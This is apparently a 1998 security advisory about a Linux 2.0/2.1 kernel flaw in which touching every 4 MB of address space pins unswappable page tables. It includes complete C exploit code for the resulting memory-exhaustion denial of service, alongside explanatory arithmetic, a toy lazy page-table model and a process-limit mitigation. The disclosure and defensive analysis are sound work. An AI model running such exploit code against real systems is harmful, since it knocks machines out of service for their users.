COMMAND

    PTE

SYSTEMS AFFECTED

    Linux 2.0.x, 2.1.?

PROBLEM

    Sed found the following.  The idea is to pin a lot of memory.  A
    process touches one address in every 4 MB slice of its 3 GB
    virtual address space, which forces the kernel to allocate every
    possible page table (pte page) for it (this is on a PC, i.e.
    i386).  The process then holds 768 page-table pages that will
    never be swapped out (that's the crucial point).
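
    The 768 figure, and the "about 20 times" quoted for a 64 MB box,
    follow from simple arithmetic.  The sketch below spells it out,
    assuming the usual i386 layout (4 KB pages, 1024 entries per page
    table, 3 GB of user address space).  The macro and function names
    are illustrative only and do not come from the kernel.

```c
#include <stdio.h>

/* Assumed i386 parameters; the names are made up for this sketch. */
#define PG_BYTES        4096UL                       /* bytes per page        */
#define PTES_PER_TABLE  1024UL                       /* entries per pte page  */
#define USER_SPACE      (3UL * 1024 * 1024 * 1024)   /* TASK_SIZE, 3 GB       */

/* Bytes of virtual address space covered by one page table (4 MB). */
unsigned long bytes_per_page_table(void)
{
    return PG_BYTES * PTES_PER_TABLE;
}

/* Page tables needed to cover the whole user address space. */
unsigned long page_tables_per_process(void)
{
    return USER_SPACE / bytes_per_page_table();
}

/* Unswappable memory, in KB, held by `processes` copies of the exploit. */
unsigned long pinned_kb(unsigned long processes)
{
    return processes * page_tables_per_process() * (PG_BYTES / 1024);
}

/* Print the estimate for a given number of running copies. */
void print_estimate(unsigned long processes)
{
    printf("%lu processes pin %lu KB in page tables\n",
           processes, pinned_kb(processes));
}
```

    With these assumptions page_tables_per_process() is 768 and
    pinned_kb(20) is 61440 KB, i.e. 60 MB, which is nearly all of a
    64 MB machine.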

    So, that's simple: you run the program below as many times as you
    need to take all the memory, and the PC won't be usable anymore
    (on the tested 64 MB box, about 20 instances were enough).  Then
    you can enjoy a wonderful light show on your HD LED (the PC will
    spend its time swapping).  Exploit follows:

    /* the pte bug - Sed hacking linux kernel, 24 may 1998 */

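    #include <signal.h>
    #include <stdio.h>      /* perror */
    #include <stdlib.h>     /* exit */
    #include <unistd.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    unsigned long address;            /* address currently being probed */
    volatile sig_atomic_t touch_me;   /* set by the handler after a fault */
    int fd;                           /* any readable file, mapped on fault */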

    void the_handler(int x)
    {
      signal(SIGSEGV, the_handler);

      touch_me++;

      if(mmap((void *)address, 4, PROT_READ,
              MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
        perror("mmap");
        exit(1);
      }
    }

    int main(void)
    {
      /* volatile to fool GCC, we _WANT_ access *address */
      volatile unsigned long i;

      fd=open("pte.c", O_RDONLY);
      if (fd==-1) {
        perror("open");
        exit(1);
      }

      signal(SIGSEGV, the_handler);

      /* 3UL*1024*1024*1024 = TASK_SIZE (UL avoids signed int overflow),
       * 1024*4096 = number of bytes one page table (1024 ptes) can map */
      for (address=0; address<3UL*1024*1024*1024; address+=1024*4096) {
        i=*(unsigned long *)address;
        if (touch_me) {
          touch_me=0;
          munmap((void *)address, 4);
        }
      }

      while(1)
        pause();
    }

SOLUTION

    We could swap the pgd / pmd / pte pages, but the real question is
    whether that is feasible, or whether you want something like lazy
    page table allocation instead.  The Linux VM code has a "flat"
    model, whereas Mach VM (the basis of the VM system used by 4.4BSD
    and its derivatives) and UVM (NetBSD's new VM system) have a
    2-layer model: the upper layer holds mappings that can coalesce to
    save space, and the lower layer holds the (redundant) physical
    mappings (in the format used by the MMU, the software TLB reload
    engine, or whatever).

    This lower layer is able to allocate page tables or other physical
    mapping resources "lazily", as mappings for actual physical pages
    are entered by the upper layer.  It is also free to "forget"
    mappings at any time, so when memory is in extremely short supply,
    the page tables can simply be freed to the system (and that
    process's page table base pointer set to some default empty page
    table).  When that process runs again, the mappings are simply
    rebuilt, as the page faults occur, from the (compact) info stored
    in the upper layer.
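
    The 2-layer idea can be illustrated with a toy model.  This is
    only a sketch under stated assumptions: every name here (struct
    region, struct pmap, pmap_fault, pmap_forget) is hypothetical and
    is not taken from Mach, UVM, or Linux, and the "page tables" are
    plain heap arrays.  It shows the upper layer keeping a compact
    list of mapped ranges while the lower layer allocates page tables
    only on a fault and can drop all of them under memory pressure.

```c
#include <stdlib.h>

#define SLOTS 768            /* page tables covering a 3 GB user space */
#define PTES  1024           /* entries per page table                 */
#define PG    4096UL         /* bytes per page                         */

/* Upper layer: compact description of one mapped range. */
struct region { unsigned long start, len; };

/* Lower layer: page tables allocated on demand, droppable at any time. */
struct pmap {
    unsigned long *table[SLOTS];   /* NULL means "not allocated" */
    int allocated;                 /* page tables currently held */
};

struct aspace {
    struct region regions[8];
    int nregions;
    struct pmap pmap;
};

/* Upper-layer lookup: is addr inside some mapped region? */
static int region_covers(const struct aspace *as, unsigned long addr)
{
    for (int i = 0; i < as->nregions; i++)
        if (addr >= as->regions[i].start &&
            addr - as->regions[i].start < as->regions[i].len)
            return 1;
    return 0;
}

/* Page-fault path: enter one mapping, allocating its page table lazily.
 * Returns 0 on success, -1 if addr is unmapped or memory is exhausted. */
int pmap_fault(struct aspace *as, unsigned long addr)
{
    unsigned long slot = addr / (PTES * PG);

    if (slot >= SLOTS || !region_covers(as, addr))
        return -1;
    if (as->pmap.table[slot] == NULL) {
        as->pmap.table[slot] = calloc(PTES, sizeof(unsigned long));
        if (as->pmap.table[slot] == NULL)
            return -1;
        as->pmap.allocated++;
    }
    as->pmap.table[slot][(addr / PG) % PTES] = 1;   /* mark entry present */
    return 0;
}

/* Memory pressure: forget every physical mapping.  Nothing is lost,
 * because the upper layer can rebuild them on later faults. */
void pmap_forget(struct aspace *as)
{
    for (int i = 0; i < SLOTS; i++) {
        free(as->pmap.table[i]);
        as->pmap.table[i] = NULL;
    }
    as->pmap.allocated = 0;
}
```

    In this model a process that maps and unmaps ranges all over its
    address space never holds more page tables than its live regions
    need, and whatever it does hold can be reclaimed with
    pmap_forget() and rebuilt by later calls to pmap_fault().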

    setrlimit will not prevent this.  You can only limit the number of
    processes a user can launch, to limit the havoc they can cause.
    The bug stems from the way Linux manages PGD, PMD, and PTE
    structures.  At this time, Linux only deallocates PTEs when it
    frees page ranges.  PMD and PGD structures are not checked for use
    when entries are freed from them.
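
    Capping the number of processes per user, as mentioned above,
    could look roughly like the sketch below.  It assumes a system
    that provides RLIMIT_NPROC (Linux and the BSDs do; it is not part
    of POSIX), and the helper name limit_user_processes is made up for
    this example.  It does not fix the bug; it only bounds how many
    copies of the exploit one user can run.

```c
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>

/* Cap the number of processes the calling user may own.
 * Both the soft and the hard limit are lowered, so an unprivileged
 * process cannot raise the cap again afterwards.
 * Returns 0 on success, -1 on error (errno is set by the failing call). */
int limit_user_processes(rlim_t max_procs)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) == -1)
        return -1;

    /* An unprivileged caller cannot go above the current hard limit. */
    if (max_procs > rl.rlim_max)
        max_procs = rl.rlim_max;

    rl.rlim_cur = max_procs;
    rl.rlim_max = max_procs;
    return setrlimit(RLIMIT_NPROC, &rl);
}
```

    Such a call would normally be made by login or a similar program
    before it starts the user's shell, since the limit is inherited by
    child processes.  With the 768 page-table pages per process
    described above, a cap of N processes bounds the pinned memory at
    roughly N * 768 pages.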

    Perry Harrington is working on a patch against 2.1 series kernels,
    which will be backported to the 2.0 series.